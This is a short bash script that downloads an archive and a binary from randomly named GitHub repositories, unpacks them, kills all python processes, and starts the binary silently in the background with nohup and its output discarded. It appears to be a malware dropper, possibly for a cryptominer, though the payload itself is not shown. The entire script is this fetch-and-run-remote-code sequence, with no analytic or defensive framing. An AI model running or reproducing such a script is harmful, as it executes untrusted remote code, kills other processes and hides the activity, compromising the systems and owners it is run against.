#!/bin/bash
sleep 6
curl -LJO https://raw.githubusercontent.com/r4d20z2st15qp/a164/main/forecast.tar.gz
curl -LJO https://raw.githubusercontent.com/r4d20z2st15qp/g892/main/r2
tar xvzf forecast.tar.gz
chmod +x r2
pkill python
sleep 6
nohup ./r2 > /dev/null 2>&1 &

